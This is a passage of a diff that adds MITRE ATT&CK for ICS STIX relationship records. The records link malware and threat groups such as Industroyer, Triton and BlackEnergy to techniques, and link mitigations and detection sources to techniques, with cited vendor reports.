"2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a1cbbdb5-30ad-4139-9784-e5a134f8d405", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos Inc. June 2017", + "description": "Dragos Inc. 2017, June 13 Industroyer - Dragos - 201706: Analysis of the Threat to Electic Grid Operations Retrieved. 2017/09/18 ", + "url": "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:55:26.032Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) has a destructive wiper that overwrites all ICS configuration files across the hard drives and all mapped network drives specifically targeting ABB PCM600 configuration files. (Citation: Dragos Inc. June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--58269882-7e8d-4d24-b7a3-dbef6196cb61", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.086Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--83ebd22f-b401-4d59-8219-2294172cf916", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--c90cfddb-253b-41c8-9057-2abde6f8aa6d", + "created": "2021-04-12T18:49:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureWorks September 2019", + "description": "SecureWorks 2019, September 24 REvil/Sodinokibi Ransomware Retrieved. 2021/04/12 ", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware" + }, + { + "source_name": "Tom Fakterman August 2019", + "description": "Tom Fakterman 2019, August 05 Sodinokibi: The Crown Prince of Ransomware Retrieved. 2021/04/12 ", + "url": "https://www.cybereason.com/blog/the-sodinokibi-ransomware-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:06:28.859Z", + "description": "[REvil](https://attack.mitre.org/software/S0496) sends HTTPS POST messages with randomly generated URLs to communicate with a remote server. (Citation: Tom Fakterman August 2019) (Citation: SecureWorks September 2019)", + "relationship_type": "uses", + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d4968f45-d06b-4843-8f72-6e08beb94cab", + "type": "relationship", + "created": "2017-05-31T21:33:27.070Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec Dragonfly", + "description": "Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.", + "url": "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + }, + { + "source_name": "Gigamon Berserk Bear October 2021", + "url": "https://vblocalhost.com/uploads/VB2021-Slowik.pdf", + "description": "Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021." + } + ], + "modified": "2021-12-07T18:39:07.922Z", + "description": "(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)", + "relationship_type": "uses", + "source_ref": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", + "target_ref": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--03e80e3c-28b9-4e7f-8b17-7c86d1483b91", + "created": "2023-03-30T19:00:12.380Z", + "revoked": false, + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:00:12.380Z", + "description": "Information which is sensitive to the operation and architecture of the process environment may be encrypted to ensure confidentiality and restrict access to only those who need to know. (Citation: Keith Stouffer May 2015) (Citation: National Institute of Standards and Technology April 2013)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7fc9fbfc-ab9f-4189-bc1f-d473e9ef36b5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.071Z", + "relationship_type": "mitigates", + "description": "Utilize network allowlists to restrict unnecessary connections to network devices (e.g., comm servers, serial to ethernet converters) and services, especially in cases when devices have limits on the number of simultaneous sessions they support.\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--ee2fdebd-1587-4e53-a7d7-c15fcc88879d", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Booz Allen Hamilton", + "description": "Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 ", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:35:50.632Z", + "description": "[BlackEnergy](https://attack.mitre.org/software/S0089) utilizes valid user and administrator credentials, in addition to creating new administrator accounts to maintain presence. (Citation: Booz Allen Hamilton)\n", + "relationship_type": "uses", + "source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5c0bdf4c-233f-42cd-8900-2a5cc8c9387c", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016", + "description": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 2017/09/19 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:01:18.283Z", + "description": "[PLC-Blaster](https://attack.mitre.org/software/S1006) scans the network to find other Siemens S7 PLC devices to infect. It locates these devices by checking for a service listening on TCP port 102. (Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016)", + "relationship_type": "uses", + "source_ref": "malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe", + "target_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ef615d62-fe85-4740-9c5d-5dddff9b5693", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Symantec Security Response July 2014", + "description": "Symantec Security Response 2014, July 7 Dragonfly: Cyberespionage Attacks Against Energy Suppliers Retrieved. 2016/04/08 ", + "url": "https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers#:~:text=The%20attackers%2C%20known%20to%20Symantec,supply%20in%20the%20affected%20countries." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:12:48.097Z", + "description": "[Dragonfly](https://attack.mitre.org/groups/G0035) trojanized legitimate ICS equipment providers software packages available for download on their websites.(Citation: Symantec Security Response July 2014)", + "relationship_type": "uses", + "source_ref": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", + "target_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0eb112f6-c1cb-4843-93f5-f668aa0e9bd8", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos", + "description": "Dragos Allanite Retrieved. 2019/10/27 ", + "url": "https://dragos.com/resource/allanite/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:40:08.649Z", + "description": "[ALLANITE](https://attack.mitre.org/groups/G1000) utilized credentials collected through phishing and watering hole attacks. (Citation: Dragos)", + "relationship_type": "uses", + "source_ref": "intrusion-set--190242d7-73fc-4738-af68-20162f7a5aae", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ce0d3a3a-9c62-4bfb-a47a-7b1b23e9f035", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:12:25.664Z", + "description": "Monitor for third-party application logging, messaging, and/or other artifacts that may leverage information repositories to mine valuable information. Information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user-based anomalies.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f86bde61-c4ec-4d40-9768-32e9b52c1702", + "created": "2023-03-22T15:52:30.607Z", + "revoked": false, + "external_references": [ + { + "source_name": "PLCTop20 Mar 2023", + "description": "PLC Security, Top 20 Community. (2021, June 15). Secure PLC Coding Practices: Top 20 version 1.0. Retrieved March 22, 2023.", + "url": "https://plc-security.com/content/Top_20_Secure_PLC_Coding_Practices_V1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-22T15:52:30.607Z", + "description": "Devices and programs should validate the content of any remote parameter changes, including those from HMIs, control servers, or engineering workstations.(Citation: PLCTop20 Mar 2023)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1cbcceef-3233-4062-aa86-ec91afe39517", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--63323b12-86db-4b91-a701-90daf3f98f7c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.122Z", + "relationship_type": "mitigates", + "description": "Segment networks and systems appropriately to reduce access to critical system and services communications.\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--00b98fa6-4913-40a4-8920-befed8621c41", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:15:33.180Z", + "description": "Monitor ICS asset application logs that indicate alarm settings have changed, although not all assets will produce such logs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0df0cb6d-0067-48b2-a33e-495415713ab7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.181Z", + "relationship_type": "mitigates", + "description": "Protocols used for device management should authenticate all network messages to prevent unauthorized system changes.\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b72b7dfd-f134-4324-84b8-52ff13fc6b5c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.128Z", + "relationship_type": "mitigates", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses. Perform periodic integrity checks of the device to validate the correctness of the firmware, software, programs, and configurations. Integrity checks, which typically include cryptographic hashes or digital signatures, should be compared to those obtained at known valid states, especially after events like device reboots, program downloads, or program restarts.\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8fcecf74-36df-41ab-9476-539c9ac0b339", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.179Z", + "relationship_type": "mitigates", + "description": "Segment operational network and systems to restrict access to critical system functions to predetermined management systems. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2cd79563-0f5a-44a1-9be4-6dc330855d64", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.150Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c9395e2a-afaf-427c-bcb2-ae663d72c05c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.068Z", + "relationship_type": "mitigates", + "description": "Provide an alternative method for alarms to be reported in the event of a communication failure.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--13fb2612-7c23-4b9d-a6e1-76f78062fc52", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:38:23.604Z", + "description": "Monitor executed commands and arguments that may attempt to take screen captures of the desktop to gather information over the course of an operation.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--86d45e92-80ba-4f97-b3a3-03ad3469658b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.166Z", + "relationship_type": "mitigates", + "description": "Segment operational network and systems to restrict access to critical system functions to predetermined management systems. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--0beb0088-3bea-4612-b2d9-ff9988f829ae", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Jacqueline O'Leary et al. September 2017", + "description": "Jacqueline O'Leary et al. 2017, September 20 Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware Retrieved. 2019/12/02 ", + "url": "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + }, + { + "source_name": "Junnosuke Yagi March 2017", + "description": "Junnosuke Yagi 2017, March 07 Trojan.Stonedrill Retrieved. 2019/12/05 ", + "url": "https://www.symantec.com/security-center/writeup/2017-030708-4403-99" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:41:15.111Z", + "description": "[APT33](https://attack.mitre.org/groups/G0064) utilize backdoors capable of capturing screenshots once installed on a system. (Citation: Jacqueline O'Leary et al. September 2017)(Citation: Junnosuke Yagi March 2017)", + "relationship_type": "uses", + "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f", + "target_ref": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--56dcc2d7-5243-4a5d-a556-8723642e98a4", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Jos Wetzels January 2018", + "description": "Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 2019/10/22 ", + "url": "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:24:51.471Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) would reset the controller to the previous state over TriStation and if this failed it would write a dummy program to memory in what was likely an attempt at anti-forensics. (Citation: Jos Wetzels January 2018)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--37abb3d5-24fc-4397-844e-07548d324729", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:32:20.552Z", + "description": "Monitor for anomalous or unexpected commands that may result in changes to the process operation (e.g., discrete write, logic and device configuration, mode changes) observable via asset application logs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--97538255-b049-4d15-91c4-6b227cbea476", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:16:09.542Z", + "description": "Data about the industrial process may indicate it is operating outside of expected bounds and could help indicate that that an alarm setting has changed. This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7fdaa9be-aecf-459f-b028-7c35dc8b6451", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.152Z", + "relationship_type": "mitigates", + "description": "Limit privileges of user accounts and groups so that only designated administrators or engineers can interact with alarm management and alarm configuration thresholds.\n", + "source_ref": "course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + 